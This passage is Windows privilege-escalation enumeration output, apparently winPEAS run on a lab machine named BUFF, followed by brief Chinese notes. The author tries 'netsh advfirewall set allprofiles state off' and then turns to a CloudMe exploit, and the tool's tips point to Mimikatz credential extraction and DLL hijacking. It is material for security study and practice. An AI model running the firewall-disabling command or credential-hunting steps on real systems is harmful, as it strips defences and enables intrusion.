1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.198 271
10.10.10.0 255.255.255.0 On-link 10.10.10.198 271
10.10.10.198 255.255.255.255 On-link 10.10.10.198 271
10.10.10.255 255.255.255.255 On-link 10.10.10.198 271
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 10.10.10.198 271
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 10.10.10.198 271
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 10.10.10.2 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
10 271 ::/0 fe80::250:56ff:feb9:6ca8
1 331 ::1/128 On-link
10 271 dead:beef::/64 On-link
10 271 dead:beef::8b/128 On-link
10 271 dead:beef::7d8e:5228:fa88:6508/128
On-link
10 271 dead:beef::b5ea:c90a:5da:c508/128
On-link
10 271 fe80::/64 On-link
10 271 fe80::7d8e:5228:fa88:6508/128
On-link
1 331 ff00::/8 On-link
10 271 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
[+] Hosts file
[+] DNS CACHE
[+] WIFI
[*] BASIC USER INFO
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups>
[+] CURRENT USER
User name shaun
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 16/06/2020 15:08:08
Password expires Never
Password changeable 16/06/2020 15:08:08
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 16/06/2020 22:38:46
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
The request will be processed at a domain controller for domain WORKGROUP.
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
[+] USERS
User accounts for \\\\BUFF
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
shaun WDAGUtilityAccount
The command completed successfully.
[+] GROUPS
Aliases for \\\\BUFF
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users
The command completed successfully.
[+] ADMINISTRATORS GROUPS
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
[+] CURRENT LOGGED USERS
No User exists for *
[+] Kerberos Tickets
Current LogonId is 0:0x17d55
Error calling API LsaCallAuthenticationPackage (ShowTickets substatus): 1312
klist failed with 0xc000005f/-1073741729: A specified logon session does not exist. It may already have been terminated.
[+] CURRENT CLIPBOARD
[i] Any password inside the clipboard?
[*] SERVICE VULNERABILITIES
[+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>
Node - BUFF
ERROR:
Description = Access denied
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\\Program files\\soft\\new folder\\exec.exe) Windows will try to execute first 'C:\\Program.exe', then 'C:\\Program Files\\soft\\new.exe' and finally 'C:\\Program Files\\soft\\new folder\\exec.exe'. Try to create 'C:\\Program Files\\soft\\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking>
C:\\Windows\\system32 NT SERVICE\\TrustedInstaller:(F)
C:\\Windows NT SERVICE\\TrustedInstaller:(F)
C:\\Windows\\System32\\Wbem NT SERVICE\\TrustedInstaller:(F)
C:\\Users\\shaun\\AppData\\Local\\Microsoft\\WindowsApps NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
BUFF\\shaun:(OI)(CI)(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault>
Currently stored credentials:
* NONE *
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi>
Directory: C:\\Users\\shaun\\AppData\\Roaming\\Microsoft\\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 14/07/2020 13:41 S-1-5-21-2277156429-3381729605-2640630771-1001
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
[i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi>
Looking inside C:\\Users\\shaun\\AppData\\Roaming\\Microsoft\\Credentials\\
Looking inside C:\\Users\\shaun\\AppData\\Local\\Microsoft\\Credentials\\
DFBE70A7E5CC19A398EBF1B96859CE5D
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe>
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files>
Looking inside HKCU\\Software\\ORL\\WinVNC3\\Password
Looking inside HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4/password
Looking inside HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\WinLogon
LastUsedUsername REG_SZ Administrator
DefaultUserName REG_SZ Administrator
DefaultDomainName REG_SZ BUFF
Looking inside HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP
Looking inside HKCU\\Software\\TightVNC\\Server
Looking inside HKCU\\Software\\SimonTatham\\PuTTY\\Sessions
Looking inside HKCU\\Software\\OpenSSH\\Agent\\Keys
C:\\Windows\\Panther\\setupinfo
C:\\Windows\\WinSxS\\amd64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1456_none_63f3fdaf124b7b7c\\appcmd.exe
C:\\Windows\\WinSxS\\amd64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1_none_8f0c17e6d938fd6f\\appcmd.exe
C:\\Windows\\WinSxS\\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1456_none_6e48a80146ac3d77\\appcmd.exe
C:\\Windows\\WinSxS\\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.17134.1_none_9960c2390d99bf6a\\appcmd.exe
C:\\xampp\\apache\\conf\\httpd.conf
C:\\xampp\\apache\\conf\\httpd.conf
C:\\xampp\\apache\\conf\\original\\httpd.conf
C:\\xampp\\apache\\conf\\original\\httpd.conf
C:\\xampp\\apache\\conf\\ssl.csr\\server.csr
C:\\xampp\\apache\\logs\\access.log
C:\\xampp\\apache\\logs\\error.log
C:\\xampp\\apache\\logs\\access.log
C:\\xampp\\apache\\logs\\error.log
C:\\xampp\\htdocs\\gym\\ex\\include\\psl-config.php
C:\\xampp\\htdocs\\gym\\include\\psl-config.php
C:\\xampp\\mysql\\backup\\my.ini
C:\\xampp\\mysql\\bin\\my.ini
C:\\xampp\\mysql\\data\\my.ini
C:\\xampp\\php\\php.ini
C:\\xampp\\php\\pear\\PEAR\\Config.php
C:\\xampp\\php\\pear\\PEAR\\Command\\Config.php
C:\\xampp\\php\\pear\\PHP\\Debug\\Renderer\\HTML\\DivConfig.php
C:\\xampp\\php\\pear\\PHP\\Debug\\Renderer\\HTML\\TableConfig.php
C:\\xampp\\php\\pear\\PHPUnit\\Util\\Configuration.php
C:\\xampp\\php\\scripts\\configure.php
C:\\xampp\\phpMyAdmin\\config.inc.php
C:\\xampp\\phpMyAdmin\\config.sample.inc.php
C:\\xampp\\phpMyAdmin\\show_config_errors.php
C:\\xampp\\phpMyAdmin\\examples\\config.manyhosts.inc.php
C:\\xampp\\phpMyAdmin\\libraries\\config.default.php
C:\\xampp\\phpMyAdmin\\libraries\\config.values.php
C:\\xampp\\phpMyAdmin\\libraries\\vendor_config.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config\\ConfigFile.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config\\ServerConfigChecks.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Config\\Forms\\Setup\\ConfigForm.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Controllers\\Setup\\ConfigController.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Plugins\\Auth\\AuthenticationConfig.php
C:\\xampp\\phpMyAdmin\\libraries\\classes\\Setup\\ConfigGenerator.php
C:\\xampp\\phpMyAdmin\\setup\\config.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCache.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCacheFactory.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCacheFactoryInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ConfigCacheInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ResourceCheckerConfigCache.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\ResourceCheckerConfigCacheFactory.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\Definition\\ConfigurationInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\config\\Definition\\Exception\\InvalidConfigurationException.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Compiler\\MergeExtensionConfigurationPass.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Compiler\\PassConfig.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Extension\\ConfigurationExtensionInterface.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\AbstractConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\AbstractServiceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\AliasConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ContainerConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\DefaultsConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\InlineServiceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\InstanceofConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ParametersConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\PrototypeConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ReferenceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ServiceConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\ServicesConfigurator.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\Traits\\AutoconfigureTrait.php
C:\\xampp\\phpMyAdmin\\vendor\\symfony\\dependency-injection\\Loader\\Configurator\\Traits\\ConfiguratorTrait.php
C:\\xampp\\phpMyAdmin\\vendor\\tecnickcom\\tcpdf\\tcpdf_autoconfig.php
C:\\xampp\\phpMyAdmin\\vendor\\tecnickcom\\tcpdf\\config\\tcpdf_config.php
---
Scan complete
先试一手关闭所有防火墙,但是权限不够。
netsh advfirewall set allprofiles state off
然后一搜cloudme一把梭哈。